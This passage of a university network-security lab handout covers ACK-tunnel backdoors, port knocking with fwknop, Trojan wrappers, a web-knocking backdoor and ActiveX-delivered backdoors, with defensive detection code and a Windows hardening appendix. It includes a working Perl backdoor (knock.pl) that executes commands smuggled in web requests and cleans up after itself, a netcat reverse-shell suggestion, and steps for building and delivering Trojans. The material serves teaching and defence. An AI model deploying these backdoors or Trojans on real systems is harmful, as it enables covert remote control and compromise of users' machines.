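    def __init__(self, allowed_inbound_ports):
        self.allowed = set(allowed_inbound_ports)
        self.table = set()               # (client_ip, client_port, server_ip, server_port)
        self.log = []

    def outbound(self, pkt):
        if "SYN" in pkt.flags:
            self.table.add((pkt.src, pkt.sport, pkt.dst, pkt.dport))
        return True

    def inbound(self, pkt):
        if "SYN" in pkt.flags and "ACK" not in pkt.flags:
            self.log.append(("SYN", pkt.src, pkt.dport))
            if pkt.dport in self.allowed:
                self.table.add((pkt.src, pkt.sport, pkt.dst, pkt.dport))
                return True
            return False
        # Anything else must be the reply direction of a known flow.
        if (pkt.dst, pkt.dport, pkt.src, pkt.sport) in self.table:
            return True
        self.log.append(("DROP-NOSTATE", pkt.src, pkt.dport))
        return False


def demo():
    """Run the same three inbound packets through both filter models."""
    inside, outside, web = "192.0.2.10", "203.0.113.5", "198.51.100.80"
    syn_out = Packet(inside, 1042, web, 80, {"SYN"})          # inside host browses out
    synack_in = Packet(web, 80, inside, 1042, {"SYN", "ACK"})  # the server's reply
    tunnel_ack = Packet(outside, 80, inside, 1054, {"ACK"})    # bare ACK to the backdoor
    probe_syn = Packet(outside, 40000, inside, 1054, {"SYN"})  # ordinary connect attempt

    results = {}
    for name, flt in (("stateless", StatelessFilter({80})),
                      ("stateful", StatefulFilter({80}))):
        flt.outbound(syn_out)
        results[name] = {
            "reply_to_browsing": flt.inbound(synack_in),
            "ack_tunnel": flt.inbound(tunnel_ack),
            "syn_probe": flt.inbound(probe_syn),
            "logged": list(flt.log),
        }
    return results


if __name__ == "__main__":
    for name, r in demo().items():
        print(name, r)
```

Both filters block the plain SYN to port 1054 and both let the legitimate reply through; the difference is that only the stateful filter rejects the bare ACK, and only it leaves a log entry for it. That is the detection and mitigation answer for this section: connection tracking, plus logging drops rather than just SYNs.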
Arne Vidstrom has released a proof-of-concept ACK tunneling cmd.exe backdoor called
ackcmd. It consists of two parts: the server, which listens on the target box, and the client, which
the attacker uses. The client uses port 80 and the server listens on port 1054. These port
numbers look surprisingly like web traffic.
For this demo, you will need two XP machines.
Get the file ackcmd.zip from the NAS to both WinXP boxes.
On the victim machine:
Unzip ackcmd.zip and run AckCmdS.exe from the command line
# AckCmdS.exe
On the attacker’s machine:
Unzip ackcmd.zip.
Open ethereal on your RH WS4 machine and capture this process.
Back on the attacking machine: “AckCmdC.exe <victim IP>” from the command line
#AckCmdC.exe <victim IP>
#ipconfig
#quit
Take a screenshot (#9) from the attacking machine.
Examine the packets in ethereal.
You can kill AckCmdS.exe on the victim’s box by pressing Ctrl-Alt-Del, selecting Processes, selecting
AckCmdS.exe and clicking End Process.
Section 8: Port Knocking
As you have seen, closing ports at the firewall is one of the best ways to secure a system.
Unfortunately, even if you close all unused ports, the services you are offering such as SSH,
HTTP, IMAP, etc. must have their ports open to allow connections. However, port knocking
allows for a server to close *ALL* ports (including those of services offered) while still allowing
connections to services. The basic principle is simple: when a user wants to connect to a closed
service, he sends packets to multiple closed ports in a secret order. If the port knock sequence is
correct, the server acts accordingly, such as by opening a port.
Despite the simplicity of the basic concept, there are several details which deserve discussion.
The most important detail is encryption; what happens if someone sniffs your knock sequence?
Under our simple description, they could merely replay the sequence and access the service.
Fortunately strong encryption can be integrated into the knock sequence to create a sequence that
is just as secure as SSL or SSH. The client and server can share a key, the key is then combined
with the source IP, port and other data. This data is encrypted and converted into a sequence of
protocol/port numbers to knock at. The server can decode and act on the request such as by
opening a specified port to/from the source IP explicitly. Even if an attacker replayed the
sequence, data such as the source IP and timestamp would fail to match, thus resulting in an
invalid knock sequence. It is also worth noting that there is no way to detect a host accepting
port knocks. The server drops all packets on the floor and doesn't even respond to a successful
knock. The only sign of success is the open port. Obviously port knocking cannot be used on
public services. It would make no sense to require a port knock from everyone to access your
public web server. But port knocking does prove very useful for restricted-access hosts.
One related common misconception is that a box which drops packets appears to the world as
if it were off/disconnected. Unfortunately, this is not the case. The difference is how the next-hop
router responds to the packet. For a box that is connected but dropping all packets, the
attacker will receive *NO* response. However, attempting to connect to a host that is off/non-existent
will result in an ICMP Destination Unreachable from the last router before the target.
This is because a connected but dropping host still responds to the router's ARP requests, so the
host is in the router's ARP table, whereas a host that is off/non-existent will not have an entry in
the router's ARP table and will not respond to ARP requests, thus resulting in the ICMP packet.
Port knocking actually originated from a virus in which the attacker included a simple port
knocking implementation to allow backdoor access to infected machines. When it was first
announced as a mainstream security measure, port knocking was heavily criticized as
security-through-obscurity. However, with the recent addition of encrypted knock sequences, port
knocking is becoming an acceptable additional layer of security. Unfortunately, there are few
implementations available and even fewer production-quality releases.
Today we will use a port knocking implementation called fwknop (Firewall Knock Operator)
that was released in 2004 at DEFCON 12. According to the fwknop website,
http://www.cipherdyne.org/fwknop/:
"fwknop implements network access controls (via iptables) based on a flexible port knocking
mini-language, but with a twist; it combines port knocking and passive operating system
fingerprinting to make it possible to do things like only allow, say, Linux-2.4/2.6 systems to
connect to your SSH daemon. fwknop supports shared, multi-protocol port knock sequences
along with both relative and absolute timeouts, and coded port knock sequences encrypted with
the Rijndael block cipher."
On your RH WS4 machine connect to the NAS and get the file “fwknop-0.4.2.tar.gz” from the
Lab6 directory. Move this file to your /root directory.
# cp ~
# tar xvfz fwknop-0.4.2.tar.gz
# cd fwknop-0.4.2
# ./install.pl
[+] Would you like access alerts sent to a different address ([y]/n)? n
[+] Enable fwknop at boot time ([y]/n)? y
Do the following steps to make sure the packets are logged:
# service syslog start
# iptables -F
# iptables -A INPUT -j LOG --log-tcp-options --log-ip-options --log-prefix "DROP:" -p tcp -m state --state NEW
# iptables -A INPUT -j DROP -p tcp -m state --state NEW
# service iptables status
Let's modify fwknop to allow us to connect to any port using an encrypted knock:
Modify the following lines in /etc/fwknop/access.conf:
KEY: <choose a key at least 8 chars long>;
This will open a firewall port for the source IP address of anyone who knows the key. Note that
the desired firewall port to open is specified by the client.
There are two daemons required for fwknop to function correctly: fwknop and knopmd. knopmd
reads the iptables logfile and extracts port knocks into a named pipe. The named pipe is then
read by fwknop, which interprets the port knocks and adds/removes iptables rules accordingly. It
is critical that both daemons are always running, so there is a third daemon, knopwatchd,
whose sole purpose is to ensure both knopmd and fwknop are running and to restart them if they
stop.
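The encrypted knock described earlier (key combined with source IP, port and time, turned into a port sequence that a replay cannot reuse) and the knopmd/fwknop split just described (a log reader feeding a decision daemon) can be seen end to end in the following Python. It is an added example, not fwknop's code and not part of the lab. fwknop encrypts the knock with Rijndael; this example swaps in an HMAC-SHA256 tag from the Python standard library, which is enough to show why a sniffed sequence replayed later, from another address, or without the key is rejected, but, unlike fwknop, it does not hide the request contents. The knock port range 1024-1279, the 30-second window, the shared key and the iptables LOG lines are all constructed assumptions.

```python
"""Replay-resistant port knocking, end to end: the client turns an authenticated
request into a sequence of destination ports; the server recovers that sequence
from iptables LOG lines (knopmd's job) and decides whether to open a port
(fwknop's job). Added example; HMAC stands in for fwknop's Rijndael encryption."""
import hashlib
import hmac
import re

KNOCK_BASE = 1024        # assumption: each request byte becomes one knock on port 1024+byte
TAG_LEN = 8              # truncated HMAC-SHA256 tag appended to the request
WINDOW_SECONDS = 30      # how stale a timestamp may be before the knock is rejected
SHARED_KEY = b"example-shared-key-at-least-8-chars"   # constructed; never hard-code a real key


def encode_knock(key, src_ip, port, proto, timestamp):
    """Client side: bind (source IP, port, protocol, time) to the key and return
    the list of destination ports to knock on, in order."""
    msg = f"{src_ip}|{port}|{proto}|{timestamp}".encode()
    tag = hmac.new(key, msg, hashlib.sha256).digest()[:TAG_LEN]
    blob = bytes([len(msg)]) + msg + tag
    return [KNOCK_BASE + b for b in blob]


def verify_knock(key, observed_src, ports, now):
    """Server side: decode the sequence seen from observed_src and return
    (port, proto) to open, or None if the tag, source IP or timestamp fails."""
    raw = bytes(p - KNOCK_BASE for p in ports if 0 <= p - KNOCK_BASE <= 255)
    if len(raw) < 1 + TAG_LEN:
        return None
    length = raw[0]
    msg, tag = raw[1:1 + length], raw[1 + length:1 + length + TAG_LEN]
    if len(msg) != length or len(tag) != TAG_LEN:
        return None
    expected = hmac.new(key, msg, hashlib.sha256).digest()[:TAG_LEN]
    if not hmac.compare_digest(tag, expected):
        return None                      # wrong key or tampered sequence
    src_ip, port, proto, ts = msg.decode().split("|")
    if src_ip != observed_src:
        return None                      # sequence replayed from another host
    if abs(now - int(ts)) > WINDOW_SECONDS:
        return None                      # sequence replayed later
    return int(port), proto


# Matches the lab's "--log-prefix DROP:" rule output; SRC and DPT are what a knock server needs.
LOG_RE = re.compile(r"DROP:.*?SRC=(\S+).*?DPT=(\d+)")


def render_log_lines(src_ip, ports):
    """Constructed iptables LOG lines, one per knock, in the shape the LOG target writes."""
    tmpl = ("Oct  5 10:00:00 rhws4 kernel: DROP:IN=eth0 OUT= SRC={src} DST=10.0.0.9 "
            "LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=1 DF PROTO=TCP SPT=40001 DPT={dpt} "
            "WINDOW=5840 RES=0x00 SYN URGP=0")
    return [tmpl.format(src=src_ip, dpt=p) for p in ports]


def process_log(key, lines, now):
    """Group dropped-packet destination ports by source (what knopmd extracts) and
    return {src: (port, proto)} for every source whose sequence verifies."""
    by_src = {}
    for line in lines:
        m = LOG_RE.search(line)
        if m:
            by_src.setdefault(m.group(1), []).append(int(m.group(2)))
    opened = {}
    for src, ports in by_src.items():
        result = verify_knock(key, src, ports, now)
        if result:
            opened[src] = result
    return opened


if __name__ == "__main__":
    ts = 1128470400                        # constructed timestamp
    seq = encode_knock(SHARED_KEY, "10.0.0.5", 22, "tcp", ts)
    log = render_log_lines("10.0.0.5", seq)
    print("fresh knock:   ", process_log(SHARED_KEY, log, now=ts + 5))
    print("replayed later:", process_log(SHARED_KEY, log, now=ts + 600))
    print("from elsewhere:", process_log(SHARED_KEY, render_log_lines("10.0.0.66", seq), now=ts + 5))
```

In a real deployment the opened entry would become an iptables ACCEPT rule for that source, and the server would also need to forget the sequence once used so that a replay inside the window from the same address cannot reopen the port.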
To start fwknop, we will run the monitoring daemon:
# knopwatchd
The server is now listening for port knocks; let's try to connect.
For simplicity we will attempt to connect from the localhost. This is essentially identical to a
remote connection, since all hosts, including loopback, should be blocked before we port-knock.
# fwknop -e -k localhost -s -p 22 -P tcp
-e: use encryption
-k: port-knock target
-s: allow source IP
-p: port to open
-P: protocol of port to open
After you enter your password, you should see the knock sequence. Notice that there is no sign
of success. All you can do now is attempt to SSH into localhost, which should work now.
# ssh localhost
You can also check the firewall ruleset to see if your special rule has been added:
# service iptables status
There are many interesting things you can do with fwknop. Explore the manpages and the
config files in /etc/fwknop to grasp the available features. One intriguing feature of fwknop is its
bundling of the passive OS fingerprinting tool p0f. This allows you to restrict port-knocks to
specific host OSes. The available OS fingerprints are in /etc/fwknop/pf.os.
1) Create an access rule to allow an OpenBSD 3.3-3.5 box on the non-routable 10.0.0.0/8
subnet to access port 22 using an encrypted knock sequence.
2) It was mentioned that port knocking began with a virus. Why would a virus writer want
to include port knocking in the backdoor?
3) No mention was made as to how port knocking servers finally close the open firewall
port. List 2 ways which could be employed to close the port.
Section 9: Tricking Users into Opening Backdoors
One way of opening backdoors is to have the very users of the machines open them for you. One
great way to do this is by sending the user a file that looks and feels safe. Programs known as
“wrappers” combine a series of files into one executable file. Once the wrapper file is opened, all
the wrapped files start to execute. The execution can be in series or in parallel, depending upon
the wrapper. We will use one of the best known wrapper utilities, eLiTeWrap v1.04:
http://homepage.ntworld.com/chawmp/elitewrap
On a windows XP machine, go into the Lab6 directory on the NAS. Make sure that the
“elitewrap” folder is there. Copy this to your desktop and unzip it.
Note that there is nothing to install. Open up a command prompt and change directory to the
“elitewrap” folder. Elitewrap is command line driven. View the readme.txt file now and make
sure you have a clear understanding of the usage of elitewrap.
We will now create a totally harmless executable. We will create a wrapper that will execute
calc.exe and notepad.exe. We will make it so that all the user sees is the calculator when they
open the wrapper executable. We also want notepad.exe to open after the user has closed the
calculator, and we also want it to be invisible.
Before proceeding, be sure to close all instances of “notepad” and “calc”. Press Ctrl-Alt-Del and
verify that neither “notepad.exe” nor “calc.exe” appears under the processes tab.
In the command prompt, follow the steps:
1. Run the executable elitewrap.exe from the appropriate directory.
2. Enter name of output file as “NewCalculator.exe”
3. Perform CRC-32 checking? No
4. Enter package file #1: C:\Windows\system32\calc.exe
5. Enter operation: 4
6. Enter command line: <blank>
7. Enter package file #2: C:\Windows\system32\notepad.exe
8. Enter operation: 9
9. Enter command line: <blank>
10. Enter package file #3: <blank>
In the Windows GUI, go into the “elitewrap” folder and you should now see a new file named
NewCalculator.exe. Double click on NewCalculator.exe and the calculator program should open
up. Now check the processes tab. Notice how calc.exe is a running process (and still no instance
of notepad.exe).
Close the calculator program.
Q10.1.1 Does the notepad program appear after closing the calculator program?
Go back to the processes window.
Q10.1.2 Can you see notepad.exe in the processes window this time?
Q10.1.3 How do you detect a Trojan of this kind?
There are other programs like Silkrope (http://www.softpedia.com/public/cat/1/1-47.shtml)
which allows an attacker to create a Trojan. For example, if you have an installer for Quake
called quake.exe and an installer for a backdoor program like the ones we examined above,
silkrope allows you to combine these two installer programs into a single executable file. Thus,
when you launch the installer for Quake, the backdoor program gets installed in the background
without the user being aware of it. It might then send out a message over the network to attackers
signaling that the machine has been compromised.
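Q10.1.3 asks how a Trojan of this kind can be detected. One generic check that does not depend on process lists is to look at the executable itself: a wrapper has to store the bundled files somewhere, and a common place is after the end of the last PE section, where the file format reserves no space. The following Python is an added example, not part of the lab and not specific to elitewrap; it assumes the wrapper appends its payloads after the stub's sections (an "overlay"), and the sample image it checks is a constructed minimal PE header, not a real wrapper output.

```python
"""Heuristic check for a wrapper-style Trojan: a PE file whose on-disk size runs
past the end of its last section carries an 'overlay' of appended data, which is
where file-bundling wrappers commonly stash their payloads. Added example; the
sample PE is constructed and the overlay assumption is stated in the lead-in."""
import struct


def overlay_size(data):
    """Return the number of bytes after the last section's raw data (0 = no overlay)."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    num_sections, = struct.unpack_from("<H", data, pe_off + 6)    # COFF NumberOfSections
    opt_size, = struct.unpack_from("<H", data, pe_off + 20)       # COFF SizeOfOptionalHeader
    sect_off = pe_off + 24 + opt_size            # section table follows the optional header
    end = sect_off + 40 * num_sections           # headers alone count as used space
    for i in range(num_sections):
        base = sect_off + 40 * i
        raw_size, raw_ptr = struct.unpack_from("<II", data, base + 16)   # SizeOfRawData, PointerToRawData
        end = max(end, raw_ptr + raw_size)
    return max(0, len(data) - end)


def check_file(path):
    """Overlay size of a PE file on disk."""
    with open(path, "rb") as f:
        return overlay_size(f.read())


def build_sample_pe(overlay=b""):
    """Constructed minimal image: DOS header, PE signature, COFF header with no
    optional header, and one .text section of 0x200 bytes at file offset 0x200.
    Not a loadable executable; just enough structure for overlay_size()."""
    pe_off = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x102)   # i386, 1 section, executable
    section = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x200,
                          0, 0, 0, 0, 0x60000020)
    image = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", pe_off)
    image += b"\0" * (pe_off - len(image))
    image += b"PE\0\0" + coff + section
    image += b"\0" * (0x200 - len(image))        # pad headers up to the section's file offset
    return image + b"\x90" * 0x200 + overlay


if __name__ == "__main__":
    clean = build_sample_pe()
    wrapped = build_sample_pe(b"PAYLOAD" * 200)  # constructed stand-in for bundled files
    print("clean image overlay:  ", overlay_size(clean))
    print("wrapped image overlay:", overlay_size(wrapped))
```

A non-zero overlay is a reason to compare the file's hash against a known-good copy (the calc.exe in system32, for instance), not proof by itself: Authenticode-signed binaries and self-extracting installers legitimately carry data past the last section.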
Section 10: Web Knocking
Traditional port knocking requires that the machine be reachable on arbitrary ports, so firewall
rules that protect machines such as web servers and mail servers, which render services only at
specific ports, can easily be set up to block it.
The concept of web knocking involves sending HTTP requests to a web server. These may be
invalid requests or requests for pages which do not exist. These requests contain, embedded in
them, commands to be executed.
The primary difference between port knocking and web knocking is that if a firewall
exists, all port knocking attempts can be thwarted, whereas web knocking attempts will
still be let through, since the firewall by default has to allow traffic on port 80 to
reach the web server.
[Figure: Port knocking v/s Web knocking. The user's port-knock attempts to ports 9250, 5250, 2234
and 1250 are blocked by the firewall (only port 80 open); the web knocking requests travel on port
80 through the firewall to the web server, which answers them with a 404.]
For further details: (You may have to use Google Translate ® )
[http://semaphor.homeunix.org/semaphor.php?item=webknocking]
(Our version of web knocking is simpler, wherein the knocking code is just a single page.
The implementation can be extended to include a complex knocking sequence which
opens up a port or sets up a remote shell)
We have created a proof of concept web knocker script in Perl. This program performs the
following tasks:
a. Define the knocking code
(The value in $var, defines the knocking code used to activate the web knocker)
b. Extract all lines from the apache error_log which contain the knocking code
(This is done so that we can see whether someone has sent the knocking code)
(We search the error_log, since this is the place all 404 File not found errors are)
c. We see which commands have already been executed and ignore those
d. For each unexecuted command, we execute it.
(If we were to run this is stealth mode, the output would not appear on screen)
e. If we wish to erase all traces of our web knocker, we send the command “clean_up”
following the knocking code.
( http://target/command_to_execute=clean_up )
knock.pl

    $var = "command_to_execute=";   # Knocking code which precedes a command
    $fname = "cmd_exec";            # Temp file name

    # Extract all lines from the log file which contain the knocking code
    # (every 404 "File does not exist" error ends up in the Apache error_log)
    system("cat /var/log/httpd/error_log | grep $var > $fname.new");

    if (! -e $fname . ".old")
    {
        system("touch $fname.old");   # Create a blank file if it does not exist
    }

    # Find the commands which have not been executed yet
    system("diff $fname.new $fname.old > diff_file");

    $LOGFILE = "diff_file";
    open(LOGFILE) or die("Could not open diff file.");
    foreach $line (<LOGFILE>) {
        $index = index($line, $var);
        next if ($index < 0);              # diff header lines carry no knocking code
        $strt = $index + length($var);
        # print "Starting : $strt : ";
        $cmd = substr($line, $strt);       # Extract the command to be executed
        chomp($cmd);                       # drop the trailing newline so "clean_up" compares equal
        if ($cmd ne "")
        {
            if ($cmd eq "clean_up")
            {
                system("rm -f $fname.*");  # Clean up temp files
                system("rm -f $LOGFILE");  # We could also remove all traces from the logs as well
                exit(1);
            }
            print "Executing : $cmd\n";    # Tell the user the command is executing
                                           # (can be commented out if running in silent mode)
            system($cmd);                  # Execute the command
        }
    }
    close(LOGFILE);
    system("mv $fname.new $fname.old");    # Store all completed commands in the old file
We would ideally run this script as a cron job to ensure that it is constantly running in the
background, instead of running it in a while loop, where it would show up as a long-running
process.
Setting up Web Knocking: [On the RedHat7.2 machine]
1. Start the httpd daemon:
$ service httpd start
2. If the httpd daemon is not installed, install it using
$ rpm -Uvh <apache installation file>
3. Once the http daemon has started, check whether you can view the homepage of the web
daemon.
4. Go to the browser and type http://a.b.c.d+1 e.g. http://57.35.6.167
5. If you cannot see a page, please ask the TA for assistance in setting up apache.
6. Once the web service has started, copy the perl script (knock.pl) to your machine.
7. To perform web knocking, we basically send a knocking code to the web server. In our
example, the knocking code is “command_to_execute=”, followed by the specific
command which we wish to execute.
Try numerous different commands such as ls, ll, ps, w, etc. and note the results.
http://a.b.c.d+1/command_to_execute=ll
http://a.b.c.d+1/command_to_execute=ps
http://a.b.c.d+1/command_to_execute=w
Additionally, you could also execute netcat to open a reverse shell from the server to your
machine.
8. Now, at the command prompt type
$ perl knock.pl
This will cause the perl script to be run, executing all the commands that were requested.
We do this so we can simulate the web knocker being executed as a cron script. Although
setting this script up as a cron job is beyond the scope of this lab, we intend to simulate
its execution.
Screenshot #1 : Capture the output of the perl script
Your output should look like
[root@RedHat72 webknock]# perl knock.pl
Executing : ll
total 36
-rw-r--r--    1 root     root            0 Oct 10 23:12 cmd_exec.new
-rw-r--r--    1 root     root          717 Oct  9 20:46 cmd_exec.old
-rw-r--r--    1 root     root          735 Oct 10 23:12 diff_file
drwxr-xr-x    2 root     root         4096 Oct  9 20:36 hello
-rwxrwxr-x    1 root     root         1085 Oct 10 11:35 knock.pl
Executing : ps
  PID TTY          TIME CMD
21023 pts/2    00:00:00 bash
21093 pts/2    00:00:00 perl
21102 pts/2    00:00:00 ps
Executing : w
 23:12:15 up 2 days, 6:40, 4 users, load average: 0.08, 0.02, 0.01
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
jeremy   :0                         Sat19   ?xdm?   7:24  0.03s  /bin/sh
jeremy   pts/1                      Sat19   2days  0.00s  0.56s  kdeinit: kded
root     pts/6                      23:12   0.00s  0.00s  0.00s  /bin/bash
root     pts/2    57.35.6.166       23:11   0.00s  0.02s  0.00s  perl knock.pl
[root@RedHat72 webknock]#
9. Under ideal conditions we would most likely set this up as a cron script so that it runs at
fixed intervals of time, say every five minutes.
10. To setup this script as a cron script, we will have to edit the crontab file in the /etc/ folder
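The same error_log that knock.pl polls is where a defender sees web knocking first. The following Python is an added example (not part of the lab and not the knocker's code) that reads Apache "File does not exist" entries, splits out any 404 whose requested filename carries a key=value command, and also counts 404s per client so that a knocking code chosen differently from the lab's still stands out. The log lines are constructed to match the Apache 1.3 error_log format and this section's knocking code, not copied from a real server.

```python
"""Spot web-knocking traffic in the Apache error_log: 404s whose requested
filename carries key=value (the knocking code followed by a command), plus clients
that pile up many 404s. Added example; the log lines are constructed."""
import re
from collections import Counter

# Apache 1.3/2.0 error_log entry for a missing file.
ERROR_404_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<client>[\d.]+)\] "
    r"File does not exist: (?P<path>.+)$")

SAMPLE_ERROR_LOG = [
    "[Mon Oct 10 23:10:40 2005] [error] [client 57.35.6.170] File does not exist: /var/www/html/favicon.ico",
    "[Mon Oct 10 23:10:41 2005] [error] [client 57.35.6.170] File does not exist: /var/www/html/robots.txt",
    "[Mon Oct 10 23:11:02 2005] [error] [client 57.35.6.166] File does not exist: /var/www/html/command_to_execute=ll",
    "[Mon Oct 10 23:11:09 2005] [error] [client 57.35.6.166] File does not exist: /var/www/html/command_to_execute=ps",
    "[Mon Oct 10 23:11:15 2005] [error] [client 57.35.6.166] File does not exist: /var/www/html/command_to_execute=w",
    "[Mon Oct 10 23:11:40 2005] [error] [client 57.35.6.171] File does not exist: /var/www/html/old/index.html",
    "[Mon Oct 10 23:12:30 2005] [error] [client 57.35.6.166] File does not exist: /var/www/html/command_to_execute=clean_up",
]


def parse_404s(lines):
    """Yield (timestamp, client, path) for each 'File does not exist' entry."""
    for line in lines:
        m = ERROR_404_RE.match(line)
        if m:
            yield m.group("ts"), m.group("client"), m.group("path")


def find_web_knocks(lines, min_hits=3):
    """Return (knocks, noisy_clients).

    knocks: 404s whose last path component contains key=value, with the key
            (the knocking code) and the value (what the knocker would run) split out.
    noisy_clients: {client: count} for clients with at least min_hits 404s."""
    knocks = []
    per_client = Counter()
    for ts, client, path in parse_404s(lines):
        per_client[client] += 1
        filename = path.rsplit("/", 1)[-1]
        if "=" in filename:                      # a static path should not carry key=value
            key, _, value = filename.partition("=")
            knocks.append({"ts": ts, "client": client, "code": key + "=", "payload": value})
    noisy = {c: n for c, n in per_client.items() if n >= min_hits}
    return knocks, noisy


if __name__ == "__main__":
    knocks, noisy = find_web_knocks(SAMPLE_ERROR_LOG)
    for k in knocks:
        print(f"{k['ts']}  {k['client']}  code={k['code']}  payload={k['payload']}")
    print("clients with many 404s:", noisy)
```

Because the script in this section removes its own temp files on "clean_up" but never touches error_log, the log remains the record; shipping it to a separate host (syslog) keeps that record out of reach of anything running on the web server.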
Section 11: Using Explorer’s ActiveX to Propagate
Trojans/Backdoors
Trojans can be distributed to users of Internet Explorer because of Explorer’s use of ActiveX,
which executes scripts from web pages. We will now use a backdoor named Tini and a program
that converts EXEs to HTML called EXE2HTML to infect a virtual machine. For this we
download EXE2HTML and Tini from: http://www.illmob.org/files.html
Tini is a small backdoor (3 kb) which will be used to open a remote shell. Size is
important because this method will fail if the file is too big, since it will occupy around 4 times its
size in HTML. Hackers will probably replace Tini with a small Trojan which automatically
downloads a bigger, more complex Trojan from the internet.
The first step is to convert Tini into an html file to be sent over the internet. For this we
perform the following set of commands:
- Copy tini.exe to the same directory as EXE2HTML.EXE.
- Double-click on EXE2HTML.EXE.
- Press Tab three times to get to the Source File: option.
- Type the name of the file to be converted to html (i.e. tini.exe).
- Press Tab five more times to reach [ ] None and check it by pressing Enter.
- Press Tab nine more times to reach [ ] Compile HTML.
Your window should now look something similar to the following screen shot:
Press Enter.
You will now have an html file named OUTPUT.HTML. This page contains the file
Tini.exe and the code necessary for Internet Explorer. An attacker would probably place this page
on a web server and give links to the people he wants to infect. We will double-click on this html
file to open it using Internet Explorer. This simulates opening a web page from a web server. You
will see a window like the following:
Internet Explorer tries to warn you, but most people just click Yes to continue. In versions 5.0/5.1
of Internet Explorer, it does not ask if you want to run the ActiveX control.
Click Yes to accept.
Because the html file was opened, the file WINDRV.HTA was created in Start > All
Programs > Startup; it contains the program to be executed.
The executable webpage is placed here because it will now be executed every time the
computer boots.
Reboot your virtual machine.
After the reboot, turn on another virtual machine to telnet from. It can be either windows or
linux. Type:
telnet <Target IP> 7777
7777 is the port number of Tini. Now wait a few seconds and press Enter. It is important that
you press Enter or you will not see anything. In linux you will now get a shell as illustrated on
the following screen shot:
In windows you will see the following:
General Questions
How long did it take you to complete this lab? Was it an appropriate length lab?
What corrections and or improvements do you suggest for this lab? Please be very specific and if
you add new material give the exact wording and instructions you would give to future students
in the new lab handout. You may cross out and edit the text of the lab on previous pages to make
corrections. You need to be very specific and provide details. You need to actually do the
suggested additions in the lab and provide solutions to your suggested additions. Caution as
usual: only extract and use the tools you downloaded in the safe and approved environment of
the network security laboratory.
Appendix A: Win XP Safeguarding
http://www.windowsecurity.com/articles/Hidden_Backdoors_Trojan_Horses_and_Rootkit_Tools_in_a_Windows_Environment.html
Is your system secure? How do you know? A machine is very rarely targeted for an attack for any other
reason than because it was vulnerable. One of the first steps in being proactive is to assess your basic
security policy rules and requirements. I think that having up-to-date anti-virus software installed is a
primary concern, and even if it won't fully protect your machine itself, it can be a lifesaver, providing good
protection against most viruses and trojans.
Another good practice is to look routinely at any modification of programs to discover new, odd services or
processes. Administration scripts are very useful tools in this regard, particularly when dealing with multiple
systems. One might also wish to consider host scanning on your network from time to time. If you suspect
that there is an open port on your computer, take a snapshot to check whether it is authorized or not. You
may use network, application diagnosis and troubleshooting programs such as TCPview (Fig. 5) [12], FPort
[13], Inzider [14], Active Ports (Fig. 6) [15], or Vision [16].
Fig. 5 The TCPview tool allows you to locate which application opened a port on your computer. Like Active Ports, it
tells you what is running on which port.
Fig. 6 Active Ports in action
These tools provide a means to identify the specific application opening the port. Moreover, they let one
avoid using Netstat, if one suspects that it has been replaced or infected. This brings me to another interesting
consideration: whichever tool is used, it is a good practice to use original tools previously uploaded to a
trusted diskette or CD-ROM when attempting to make a check of the system. If any doubt exists whether
individual tools are original ones, checksum them to check if they match the installation CD-ROM.
In this regard, ListDlls [17] and Process Explorer [18] (Fig. 7) can certainly be useful in finding any suspect
signs of trojan-infected or backdoored processes.
Fig. 7 Process Explorer displays object processes and related DLL libraries
These programs with their DLL libraries give some assistance and provide additional information on handling
incidents, investigations and conducting analysis to gather legal evidence in view of criminal prosecution.
May I also suggest that one pay closer attention to the registry keys that are responsible for starting
programs on the system startup. In most cases, these registry elements usually contain some indication of
how the intruder gained access, from where, when, etc. These are:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\KnownDLLs
HKEY_LOCAL_MACHINE\System\ControlSet001\Control\Session Manager\KnownDLLs
HKEY_LOCAL_MACHINE\System\ControlSet\Services
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\RunOnceEx
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\WinLogon
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows (run)
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\RunOnceEx
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows (run)
HKEY_CLASSES_ROOT\exefile\shell\open\command
It is extremely important to establish consistent access permissions on these keys and activate inspection
tools to continuously monitor for any malicious attempts. The same applies to those system directories and
files that are security critical. A commonly accepted computer security policy usually starts with a “sound”
firewall as a guard against backdoors. Even if the intruder manages to install a backdoor, the firewall will
block him from getting to the listening port.
In fact, bypassing a firewall is not a plug-n-play thing, but I take liberty to serve a nice dose of pessimism.
There are known hacker tools that can get through even the most hardened firewalls.
However this is beyond the scope of this article, so I would recommend reading the document available at
the address: http://www.spirit.com/Network/net0699.txt.
Finally, I would like to raise your awareness about a certain issue. Once your machine has been
compromised and the hacker has gained total administrative access, be very careful in recovering the
system from the back-up copy or the disk image! I have personally experienced a situation, where someone
replaced a WWW site. The system administrator had retrieved the system from a back-up copy, patched the
system, updated the access database and changed passwords. Thus, he has considered the server perfectly
safe. But he overlooked the fact, that the intrusion had been made long before he made the copy containing
a back-doored version. So, I would strongly recommend checking the system whenever it is backed up.
Hackers increasingly threaten the network community with their new techniques, backdoors and Trojan
horses. Therefore we must take steps to guard against known methods of hacking, even though there will
still be a large number of worrying factors we don’t know about. The only thing that is absolutely obvious is that you
never know how long your immune system can hold out before breaking down.
Tools:
